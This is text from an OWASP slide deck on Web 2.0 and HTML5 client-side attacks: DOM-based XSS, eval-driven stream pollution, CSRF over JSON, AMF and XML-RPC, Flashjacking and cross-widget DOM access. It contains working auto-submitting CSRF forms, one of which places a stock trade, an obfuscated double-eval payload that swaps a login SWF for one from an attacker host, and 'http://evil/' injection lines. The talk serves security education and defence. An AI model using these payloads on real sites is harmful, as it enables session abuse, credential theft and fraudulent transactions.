  • 30. DOM Calls JSON XML JS-Script JS-Object JS-Array OWASP 30
  • 31. DOM based XSS It is a sleeping giant in the Ajax applications Root cause DOM is already loaded Application is single page and DOM remains same New information coming needs to be injected in using various DOM calls like eval() Information is coming from untrusted sources OWASP 31
  • 32. Example cases Various different way DOM based XSS can take place Example Simple DOM function using URL to process ajax calls Third party content going into existing DOM and call is not secure Ajax call from application, what if we make a direct call to the link – JSON may cause XSS OWASP 32
  • 33. DOM based URL parsing Ajax applications are already loaded and developers may be using static function to pass arguments from URL For example hu = window.location.search.substring(1); Above parameter is going to following ajax function eval('getProduct('+ koko.toString()+')'); DOM based XSS OWASP 33
  • 34. Demo Scanning with DOMScan Injecting payload in the call OWASP 34
  • 35. Third Party Streaming Documents Attacker News Weather Mails Bank/Trade Browser Internet RSS feeds Ajax RIA (Flash/Silver) Internet App HTML / JS / DOM Blog Database Authentication Stream Application Infrastructure eval() Web Services End point XSS OWASP 35
  • 36. Stream processing if (http.readyState == 4) { var response = http.responseText; var p = eval("(" + response + ")"); document.open(); document.write(p.firstName+"<br>"); document.write(p.lastName+"<br>"); document.write(p.phoneNumbers[0]); document.close(); OWASP 36
  • 37. Polluting Streams XML/ JS-Object / JS-Array / JS-Script / JSON attacker 8008 proxy Web app DB Web Server Web app DB Web app Stream Web Client eval() XSS OWASP 37
  • 38. Exploiting DOM calls document.write(…) document.writeln(…) document.body.innerHtml=… document.forms[0].action=… Example of vulnerable document.attachEvent(…) Calls document.create…(…) document.execCommand(…) document.body. … window.attachEvent(…) document.location=… document.location.hostname=… document.location.replace(…) document.location.assign(…) document.URL=… window.navigate(…) OWASP 38
  • 39. Demo Sample call demo DOMScan to identify vulnerability OWASP 39
  • 40. Direct Ajax Call Ajax function would be making a back-end call Back-end would be returning JSON stream or any other and get injected in DOM In some libraries their content type would allow them to get loaded in browser directly In that case bypassing DOM processing… OWASP 40
  • 41. Demo DWR/JSON call – bypassing and direct stream access OWASP 41
  • 42. ABUSING SOCKETS, XHR & CSRF OWASP 42
  • 43. Abusing network calls HTML 5 provides WebSocket and XHR Level 2 calls It allows to make cross domains call and raw socket capabilities It can be leveraged by JavaScript payload Malware or worm can use it to perform several scanning tasks OWASP 43
  • 44. Internal Scanning Allows internal scanning, setting backward hidden channel, opening calls to proxy/cache. Some browsers have blocked these calls for security reason. OWASP 44
  • 45. XHR/CSRF ETC. OWASP 45
  • 46. XHR – Level 2 calls XHR is now level 2 on browser Various browser behavior is different XHR is already implemented Shared resource policy implemented “orgin” and “access-*” tags and decisions based on that Potential abuses One way stealth channel CSRF possible (no cookie though) Header changes CROS - http://www.w3.org/TR/cors/ (Cross Origin Request Sharing) OWASP 46
  • 47. CSRF CSRF is possible with Web 2.0 streams by abusing DOM calls XML manipulations CSRF with JSON AMX is also XML stream Attacker injects simple HTML payload Initiate a request from browser to target cross domain OWASP 47
  • 48. How it works? OWASP 48
  • 49. JSON <html> <body> <FORM NAME="buy" ENCTYPE="text/plain" action="http://192.168.100.101/json/jservice.ashx" METHOD="POST"> <input type="hidden" name='{"id":3,"method":"getProduct","params":{ "id" : 3}}' value='foo'> </FORM> <script>document.buy.submit();</script> </body> </html> OWASP 49
  • 50. HTTP Req. POST /json/jservice.ashx HTTP/1.1 Host: 192.168.100.2 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Content-Type: text/plain Content-Length: 57 {"id":3,"method":"getProduct","params":{ "id" : 3}}=foo OWASP 50
  • 51. HTTP Resp. HTTP/1.1 200 OK Date: Sat, 17 Jul 2010 09:14:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/plain; charset=utf-8 Content-Length: 1135 {"id":3,"result":{"Products":{"columns":["product_id","product_name","product_desc_summary","product_desc","product_price","image _path","rebates_file"],"rows":[[3,"Doctor Zhivago","Drama / Romance","David Lean's DOCTOR ZHIVAGO is an exploration of the Russian Revolution as seen from the point of view of the intellectual, introspective title character (Omar Sharif). As the political landscape changes, and the Czarist regime comes to an end, Dr. Zhivago's relationships reflect the political turmoil raging about him. Though he is married, the vagaries of war lead him to begin a love affair with the beautiful Lara (Julie Christie). But he cannot escape the machinations of a band of selfish and cruel characters: General Strelnikov (Tom Courtenay), a Bolshevik General; Komarovsky (Rod Steiger), Lara's former lover; and Yevgraf (Alec Guinness), Zhivago's sinister half-brother. This epic, sweeping romance, told in flashback, captures the lushness of Moscow before the war and the violent social upheaval that followed. The film is based on the Pulitzer Prize-winning novel by Boris Pasternak.",10.99,"zhivago","zhivago.html"]]}}} OWASP 51
  • 52. AMF <html> <body> <FORM NAME="buy" ENCTYPE="text/plain" action="http://192.168.100.101:8080/samples/messagebroker/http" METHOD="POST"> <input type="hidden" name='<amfx ver' value='"3" xmlns="http://www.macromedia.com/2005/amfx"><body><object type="flex.messaging.messages.CommandMessage"><traits><string>body</string ><string>clientId</string><string>correlationId</string><string>destination</strin g><string>headers</string><string>messageId</string><string>operation</string ><string>timestamp</string><string>timeToLive</string></traits><object><traits /></object><null/><string/><string/><object><traits><string>DSId</string><str ing>DSMessagingVersion</string></traits><string>nil</string><int>1</int></obje ct><string>68AFD7CE-BFE2-4881-E6FD- 694A0148122B</string><int>5</int><int>0</int><int>0</int></object></body> </amfx>'> </FORM> <script>document.buy.submit();</script> </body> </html> OWASP 52
  • 53. XML <html> <body> <FORM NAME="buy" ENCTYPE="text/plain" action="http://trade.example.com/xmlrpc/trade.rem" METHOD="POST"> <input type="hidden" name='<?xml version' value='"1.0"?><methodCall><methodName>stocks.buy</methodN ame><params><param><value><string>MSFT</string></value> </param><param><value><double>26</double></value></para m></params></methodCall>'> </FORM> <script>document.buy.submit();</script> </body> </html> OWASP 53
  • 54. Demos Simple trade demo – XML-RPC call CSRF. OWASP 54
  • 55. FLASHJACKING OWASP 55
  • 56. Flashjacking It is possible to have some integrated attacks DOM based XSS CSRF Flash DOM based issue can change flash/swf file – it can be changed at run time – user will not come to know .. Example document.getElementsByName(“login").item(0).src = "http://evil/login.swf" OWASP 56
  • 57. Double eval – eval the eval Payload - document.getElementsByName('Login').item(0 ).src='http://192.168.100.200:8080/flex/Login n/Loginn.swf‘ Converting for double eval to inject ‘ and “ etc… eval(String.fromCharCode(100,111,99,117,109,101,110,116,4 6,103,101,116,69,108,101,109,101,110,116,115,66,121,78,97 ,109,101,40,39,76,111,103,105,110,39,41,46,105,116,101,10 9,40,48,41,46,115,114,99,61,39,104,116,116,112,58,47,47,49 ,57,50,46,49,54,56,46,49,48,48,46,50,48,48,58,56,48,56,48,4 7,102,108,101,120,47,76,111,103,105,110,110,47,76,111,103 ,105,110,110,46,115,119,102,39)) OWASP 57
  • 58. silvelightjacking It is possible to have some integrated attacks DOM based XSS CSRF Silvelight files DOM based issue can change xap file – it can be changed at run time – user will not come to know .. Example document.getElementsByName(“login").item(0).src = "http://evil/login.xap" OWASP 58
  • 60. Widgets Widgets/Gadgets/Modules – popular with Web 2.0 applications Small programs runs under browser JavaScript and HTML based components In some cases they share same DOM – Yes, same DOM It can cause a cross widget channels Exploitable … OWASP 60
  • 61. Cross DOM Access Widget 1 Widget 2 Widget 3 Email Widget RSS Feed Reader Attacker DOM – Shared DOM Setting the trap OWASP 61
  • 62. DOM traps It is possible to access DOM events, variables, logic etc. Sandbox is required at the architecture layer to protect cross widget access Segregating DOM by iframe may help Flash based widget is having its own issues as well Code analysis of widgets before allowing them to load OWASP 62
  • 63. Demo Cross Widget Spying Using DOMScan to review Widget Architecture and Access Mechanism RSS Feed Hacking Mashup Hacks Cross Domain Callback Hacking OWASP 63
  • 65. Security at CODE Level JS, Flash or XAP should not have server side logic – should be presentation layer only … Obfuscation may help a bit – not full proof. Source code and object code analysis during blackbox testing would require Resource discoveries and fuzzing – a must for SOAP, JSON and AMF streams Careful with HTML 5 implementation DOM based scanning and analysis is required Cross streams and third party analytics OWASP 65
  • 66. http://shreeraj.blogspot.com shreeraj@blueinfy.com http://www.blueinfy.com CONCLUSION AND QUESTIONS OWASP 66